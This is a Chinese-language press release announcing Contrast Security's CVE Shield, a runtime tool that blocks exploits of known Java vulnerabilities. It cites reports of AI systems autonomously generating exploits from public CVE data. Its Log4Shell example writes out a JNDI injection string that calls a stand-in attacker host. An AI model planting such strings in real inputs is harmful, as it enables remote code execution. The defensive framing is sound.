應用程式偵測與回應(ADR)領域領導者對比安全(Contrast Security)今日公布「對比CVE防護盾」(Contrast CVE Shield),旨在阻止由克勞德神話(Claude Mythos)等尖端模型生成的人工智能攻擊浪潮。
對比CVE防護盾在運行中應用程式內部運作,偵測、監控並阻止利用已知漏洞。合法程式庫功能可繼續運作,同時安全團隊可獲取證據,顯示哪些漏洞存在、哪些活躍、哪些正受攻擊以及哪些已受保護。
運行時,對比CVE防護盾在多個應用程式中偵測到多個CVE,評估其嚴重性,現正阻止惡意功能呼叫,同時不影響正常應用程式行為。 AP圖片
透過為每個受支援的CVE使用運行時微沙盒,CVE防護盾是一種補償性控制措施,為機構提供即時保護,讓他們在測試及部署永久修復期間獲得保護。
2026年4月,Anthropic公司報告指,其克勞德神話預覽研究系統可獲取公開CVE識別碼及相應Git提交,並於一日內以低成本自主生成有效攻擊。五星期內,OpenAI及微軟披露類似漏洞研究系統。
對比安全創辦人兼OWASP十大創建者謝夫威廉斯(Jeff Williams)表示:「機構正成立神話專責小組,因為傳統修補週期無法跟上人工智能生成攻擊的速度。我們創建CVE防護盾旨在為他們提供即時保護,並為安全團隊爭取從CVE披露到修補程式部署之間的時間。舊有應用程式、供應商依賴及凍結發布期,不再意味著開放風險。」
為人工智能速度攻擊而設
傳統CVE管理識別出實際在生產環境中重要的5% CVE,並創建修復工單。團隊仍需判斷有漏洞程式碼是否實際運行中、可觸及、可利用,並連接到敏感資產,然後在測試及部署更新期間保護應用程式。
CVE防護盾在團隊修補期間增加運行時保護。它並非嘗試識別每個惡意負載,而是阻止攻擊必須使用的成功功能,例如原生程式碼執行、遠端類別載入及任意檔案寫入。
由於CVE防護盾控制行為而非依賴負載簽名,受支援攻擊的新變種會觸及相同的受保護邊界,無需新簽名。
即使攻擊者透過有效攻擊觸及有漏洞程式碼,CVE防護盾仍可阻止攻擊完成其預期動作。
IDC高級研究經理姬蒂諾頓(Katie Norton)表示:「開發人員及安全團隊長期以來一直難以優先處理CVE,因為傳統工具側重於有漏洞版本而非實際執行。將CVE識別與運行時可觸及性及主動保護連接起來的功能,代表著邁向更具操作相關性的應用程式安全的重要一步。」
Log4Shell例子
以Log4Shell為例,它是最廣為人知的CVE。Log4Shell,追蹤為CVE-2021-44228,攻擊者透過將${jndi:ldap://attacker.example/x}等標記植入由應用程式或API記錄的請求數據中進行利用,這會觸發外部查詢,載入並運行攻擊者控制的程式碼。
CVE防護盾封裝有漏洞的Log4j方法,因此正常記錄可繼續運作,同時攻擊所需的功能,即外部JNDI查詢、遠端類別載入及程序執行,則被拒絕。查詢永遠不會到達攻擊者伺服器,惡意類別亦永遠不會載入。
有漏洞組件繼續運作。攻擊則不會。
為生產環境而設計
CVE防護盾透過單一指令安裝於工作負載,並即時開始識別及防護CVE攻擊嘗試。它無需額外設備、代理或輔助程式。
CVE防護盾旨在實現最高效能。除非CVE被利用,否則不會產生影響,攻擊防護僅增加12納秒,使CVE防護盾的效能影響幾乎無法測量。它可輕鬆安裝於單一主機或大型多元化基礎設施中。
應用程式啟動後,CVE防護盾會清點其程式庫,並為匹配的有漏洞版本啟動防護。對比代理操作器自動化部署至Kubernetes及OpenShift工作負載,無需更改每個服務的程式碼或Dockerfile。
CVE防護盾亦以運行時證據取代漏洞假設。它向安全團隊顯示哪些有漏洞程式庫存在、哪些有漏洞程式碼路徑正在被執行,以及何時嘗試利用。
團隊可將修復工作集中於實際應用程式風險,而非將待辦事項中的每個項目視為同樣緊急。對比安全根據生產環境中的架構、威脅及業務背景,為CVE提供動態風險評分。
供應情況
CVE防護盾是對比應用程式偵測與回應的一部分。其初步推出為60個關鍵Java漏洞帶來本地化CVE沙盒,包括Log4Shell、Spring4Shell及Apache Commons Collections反序列化漏洞。對比安全將擴大覆蓋範圍至其他高危及關鍵嚴重性CVE,並隨著漏洞出現持續提供新防護。計劃於2026年下半年支援Go、Node.js、.NET及Python。
CVE防護盾將於2026年8月3日推出,並設有免費層級,使應用程式安全團隊可在數分鐘內部署至Java應用程式,並即時獲得活躍、受支援CVE的運行時可見性。
2026年8月3日前,可登記加入對比CVE防護盾等候名單。8月3日後,請瀏覽對比CVE防護盾註冊頁面。
對比安全是應用程式偵測與回應(ADR)的全球領導者,賦能機構實時發現並阻止應用程式及API上的攻擊。對比安全將專利威脅感應器直接嵌入軟件中,提供無與倫比的可見性及保護。透過持續防禦,對比安全揭示傳統解決方案遺漏的隱藏應用程式層風險。對比安全強大運行時安全技術,為開發人員、應用程式安全團隊及安全運營團隊提供單一平台,主動保護及防禦應用程式及API免受不斷演變的威脅。
(美聯社)